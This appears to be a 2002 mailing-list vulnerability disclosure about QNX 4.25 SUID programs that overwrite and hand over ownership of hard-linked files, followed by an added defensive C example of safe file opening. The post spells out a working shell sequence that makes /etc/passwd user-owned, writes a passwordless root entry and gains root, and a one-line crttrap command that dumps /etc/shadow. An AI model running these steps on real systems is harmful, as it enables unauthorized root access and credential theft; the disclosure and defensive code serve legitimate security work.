From: Simon Ouellette (einherjhotmail.com)
Date: Fri May 31 2002 - 16:42:17 CDT

    I think I found what appears to be several (or one fundamental)
    vulnerabilities under QNX (tested on version 4.25). I have not found any
    documentation/reference to these anywhere, so I assume they/it were not
    known.

    Importance of the bug: any local user can gain root access (which, under QNX,
    means root access to the entire network, of course).

    Nature: some (or "most"? or "all"?) SUID programs that output data to files
    actually do not look for permissions before overwriting identical (already
    existent) filenames. Also, they follow hard links (I did not verify how they
    react to symbolic links). In fact, not only do they overwrite the files, but
    they give the user ownership of the file. So programs like /bin/dumper,
    monitor, the Watcom "sample" utility, can be used to overwrite and gain
    ownership of read-only, root-owned files such as /etc/passwd. From there,
    it's easy to figure out how to gain root access...

    Example exploit, with /bin/dumper:

    Let EVIL be the unprivileged user who wants to gain root access.

    #link to the passwd file: dumper dumps to [process name].dmp
    $ ln /etc/passwd /home/EVIL/ksh.dmp
    #call the program that will attempt to write to the hard link
    $ dumper -d /home/EVIL -p [PID of EVIL's ksh]
    #have dumper do its job by terminating the monitored process
    $ exit
    #at this point, /etc/passwd is overwritten by the binary dump, and more
    #importantly: EVIL is now the owner!
    $ echo root::0:0::///:/bin/sh > /etc/passwd
    #but now no login works because /etc/passwd is not owned by userid 0.
    #So you do:

    $ passwd

    #and change your password. This gives /etc/passwd ownership back to root,
    #keeping the modifications you have made.

    $ su
    #

    "monitor" is even easier to exploit, for example, because you can directly
    specify the filename with the parameter -f /etc/passwd. No need for a link.

    Another similar vulnerability was with crttrap. This utility has one
    interesting parameter/option that allows you to dump the contents of the
    configuration file.... and it is SUID. So all you have to do is:
    $ crttrap -c /etc/shadow

    ...and it will dump the shadow file for you (even if you normally do not have
    read access to it, such as with an unprivileged user).

    So this can either be seen as multiple vulnerabilities in different
    programs, or as a single fundamental flaw in the ownership/permissions
    checking of the filesystem. I could not tell at what level exactly the
    flaw is.

    Could some of you reproduce the exploit and confirm that it works? I would
    like to make sure that it is not specific to, maybe, some configuration flaw
    in the systems I used to test it. Also, if you could check with the most
    recent QNX versions to see if this is still applicable...

    P.S.: I also noticed that Watcom sample and int10, but not monitor, will
    segfault when they are given long filenames as a parameter... Maybe this can
    turn into a buffer overflow, but I did not have the time to check.

    Simon Ouellette
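
A defensive counterpart to the flaw reported above, added here as an example and not part of the original post or of any QNX code: a set-uid writer opens its output file under the real user's identity and create-only, so an existing name such as a hard link to a protected file is refused instead of being overwritten and handed over. It assumes a POSIX system with `seteuid` and `O_NOFOLLOW`; the names `open_dump_file` and `demo_hardlink_refused` are hypothetical.

```c
#define _GNU_SOURCE            /* O_NOFOLLOW, seteuid, mkdtemp on glibc */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Open a dump file as a set-uid writer should: under the caller's own identity,
 * create-only, never through a symlink. Returns an fd, or -1 with errno set. */
int open_dump_file(const char *path)
{
    uid_t saved = geteuid();
    struct stat st;
    if (seteuid(getuid()) != 0) return -1;  /* act as the invoking user */
    /* O_EXCL refuses any existing name, including a hard link to a system file;
     * O_NOFOLLOW refuses a symlink as the final path component. */
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    int err = errno;
    if (seteuid(saved) != 0) abort();       /* never run on in an unknown state */
    if (fd < 0) { errno = err; return -1; }
    /* Confirm the result: a regular file owned by the real user. */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_uid != getuid()) {
        close(fd); errno = EPERM; return -1;
    }
    return fd;
}

/* Constructed scenario: "victim" stands in for a protected file, ksh.dmp is a
 * hard link to it. Returns 1 if the link is refused, the victim is unchanged
 * and a fresh name still opens; 0 otherwise. */
int demo_hardlink_refused(void)
{
    char dir[] = "/tmp/dumpdemoXXXXXX", victim[64], dmp[64], fresh[64];
    struct stat st;
    if (!mkdtemp(dir)) return 0;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(dmp, sizeof dmp, "%s/ksh.dmp", dir);
    snprintf(fresh, sizeof fresh, "%s/new.dmp", dir);
    int v = open(victim, O_WRONLY | O_CREAT, 0644);
    if (v < 0 || write(v, "root:x:0:0\n", 11) != 11 || link(victim, dmp) != 0) return 0;
    close(v);
    int refused = open_dump_file(dmp) == -1 && errno == EEXIST;
    int intact = stat(victim, &st) == 0 && st.st_size == 11;
    int fd = open_dump_file(fresh);
    if (fd >= 0) close(fd);
    unlink(dmp); unlink(fresh); unlink(victim); rmdir(dir);
    return refused && intact && fd >= 0;
}
int main(void) { return demo_hardlink_refused() ? 0 : 1; }
```

Because the open happens with the real UID, the same pattern also denies a read of a file the caller cannot normally read, which is the crttrap case in the post.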
